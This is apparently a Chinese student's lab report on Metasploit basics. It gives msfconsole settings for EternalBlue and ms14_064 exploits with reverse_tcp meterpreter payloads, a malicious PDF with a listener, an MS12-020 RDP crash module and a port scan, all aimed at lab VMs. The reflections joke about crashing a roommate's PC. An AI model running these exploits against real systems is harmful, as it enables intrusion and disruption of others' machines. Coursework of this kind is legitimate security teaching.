2018-2019 网络对抗技术 20165231 Exp5 MSF基础应用
实践内容(3.5分)
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践(1分)
- ms08_067; (失败)
- MS17-010永恒之蓝(成功)
- MS12-20(比永恒之蓝更蓝的蓝屏)(本来以为唯一后来不唯一了)
1.2 一个针对浏览器的攻击(1分)
- ms14_064(成功)
1.3 一个针对客户端的攻击(1分)
- Adobe(成功)
1.4 成功应用任何一个辅助模块。(0.5分)
- 扫描查看靶机开放端口(唯一)
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。
实验过程
基础问题回答
(1)用自己的话解释什么是exploit,payload,encode.
任务一:一个主动攻击实践
漏洞MS08_067
关于漏洞MS08_067的原理
msfconsole进入msf控制台
search ms08_067查看该漏洞
use exploit/windows/smb/ms08_067_netapi使用该漏洞
show payloads回链攻击载荷
set LHOST 192.168.70.131 //攻击机的ip地址
set LPORT 5231 //攻击的端口
set RHOST 192.168.70.140 //靶机的ip地址
set target 0 //选择目标系统类型
exploit //进行攻击
关闭防火墙,改变安全策略,查看445端口状况,甚至改变winxp版本,由中文版改成英文版
很遗憾始终是只能检测出系统却无法生成有效的会话
ms17_010永恒之蓝
攻击方:kali 192.168.70.131
靶机:win7 192.168.70.130
输入msfconsole指令,打开控制台;
依次输入以下指令进行设置与攻击:
set payload windows/x64/meterpreter/reverse_tcp //选择攻击载荷
set LHOST 192.168.70.131 //设置攻击方ip
set RHOST 192.168.70.130 //设置靶机ip
exploit
连接成功

尝试命令查看靶机ip

MS12-20
攻击机kali 192.168.70.131
靶机windows 7 192.168.70.130
用kali自带的的扫描工具nmap 查看靶机是否开启3389端口。(没开就把他打开!)
扫描之后发现3389是开放的,然后启动msfconsole, 利用里面的模块查看是否存在Ms12-020漏洞。

查询模块
set RHOST 192.168.70.130 //设置靶机地址
然后exploit

100%表示可以攻击
攻击模块
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //加载攻击模块
set RHOST 192.168.70.130 //设置靶机地址
然后还是exploit

出现seems down说明靶机已经蓝上了!


一个针对浏览器的攻击
ms14_064
主机 kali 192.168.70.131
靶机 Windows XP SP3 192.168.70.141
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.70.131
set LPORT 2016
set URIPATH wyhy
然后exploit开启监听,然后生成网址,将这个网址在靶机打开后攻击机就捕获了靶机,建立会话

一个针对客户端的攻击
Adobe
攻击方:kali 192.168.70.131
靶机:winxp 192.168.70.141
输入msfconsole指令,打开控制台;
依次输入以下指令进行设置
set payload windows/meterpreter/reverse_tcp //设置tcp反向连接
set LHOST 192.168.70.131//攻击方IP
set LPORT 5231 //攻击方攻击端口
set FILENAME wyhy_exp5.pdf

在终端中,将生成的文件按照文件路径复制出来,并复制到靶机中
在kali中重新打开,并输入以下指令进行监听:
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //设置tcp反向连接
set LHOST 192.168.70.131 //攻击方IP
set LPORT 5231 //攻击方攻击端口
exploit //监听

辅助模块
查看靶机端口
使用auxiliary/scanner/portscan/tcp模块,用来扫描靶机的TCP端口使用情况;
执行命令use auxiliary/scanner/portscan/tcp进入并使用模块;
show options查看需要设置的参数信息,设置靶机的ip为RHOST

set PORT 1-5231
然后expolit

基础问题回答
- 用自己的话解释什么是exploit,payload,encode.
exploit:英文翻译为利用,黑客就是利用漏洞对电脑进行攻击,有漏洞不一定可以利用,但可以利用的一定有漏洞。
payload:有效载荷。通常在传输数据时,为了使数据传输更可靠,要把原始数据分批传输,并且在每一批数据的头和尾都加上一定的辅助信息,而其中的原始数据就是payload
encode:编码器,用来给payload进行编码,保护payload不被发现
离实战还缺些什么技术或步骤?
实战?首先我们只能在自己的局域网内实现。对于外网,不在同一子网下的地址锁定无法实现就无法实战攻击,我觉得这是目前最大缺憾。
实验感想
这次我最喜欢的就是那个蓝屏漏洞,在CSDN上逛到的以为我是独一无二结果……不过还是觉得那个很好玩,起初想做这个是想搞一下正在打Apex的室友让他感受一下快要吃鸡蓝个屏,但是系统版本高了没啥用。后续我会继续利用更新的漏洞让室友感受吃不到鸡的乐趣o( ̄▽ ̄)o
2018-2019 网络对抗技术 20165231 Exp5 MSF基础应用的更多相关文章
- 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...
- 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...
- 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...
- 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...
- 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...
- 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8
<网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...
- 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...
随机推荐
- TypeError: argument 1 must be an integer, not _subprocess_handle/OSError: [WinError 87]
Error Msg: Traceback (most recent call last): File "c:\python27\lib\site-packages\celery\worker ...
- nginx简单的命令
nginx -s reload|reopen|stop|quit #重新加载配置|重启|停止|退出 nginx nginx -t #测试配置是否有语法错误 nginx [-?hvVtq] [-s si ...
- PyQt5中的信号与槽,js 与 Qt 对象之间互相调用
一.PyQt中的信号与槽 信号(Signal)和槽(Slot)是Qt中的核心机制,用在对象之间互相通信.在Qt中每个QObject对象和PyQt中所有继承自QWidget的控件(这些都是QObject ...
- MySQL之开发规范
一..数据库命名规范 1.所有数据库对象名称必须使用小写字母并用下划线分割 2.所有数据库对象名称禁止使用mysql保留关键字(如果表名中包含关键字查询时,需要将其用单引号括起来) 3.数据库对象的命 ...
- FJUTOJ-周赛2016-12-16
注:fjutoj基本每周都有一次周赛,欢迎大家都来参加! 网址:http://59.77.139.92/index.jsp A题:来源 POJ 2773 题意:给两个数m和k,问第k 个和m 互素的数 ...
- SpringCloud---熔断降级理解、Hystrix实战(五)
SpringCloud---熔断降级理解.Hystrix实战(五) https://www.cnblogs.com/qdhxhz/p/9581440.html https://blog.csdn.ne ...
- 在windows环境利用celery实现简单的任务队列
测试使用环境: 1.Python==3.6.1 2.MongoDB==3.6.2 3.celery==4.1.1 4.eventlet==0.23.0 Celery分为3个部分 (1)worker部分 ...
- filebeat-6.4.3-windows-x86_64输出Kafka
配置filebeat.yml文件 filebeat.prospectors: - type: log encoding: utf- enabled: true paths: - e:\log.log ...
- HNOI2019游记
\(day~?\) 我们的老师告诉我说,你这次省选目标分:\(70\),拿不到,家法伺候.但其实,我的目标是不爆零!!! \(day~-1\) 这天晚上,我们的指导老师给我们试了一下ZJOI2019, ...
- Java 写 Log
. 一个最基本的例子 使用Logging框架写Log基本上就三个步骤 引入loggerg类和logger工厂类 声明logger 记录日志 下面看一个例子 //1. 引入slf4j接口的Logger和 ...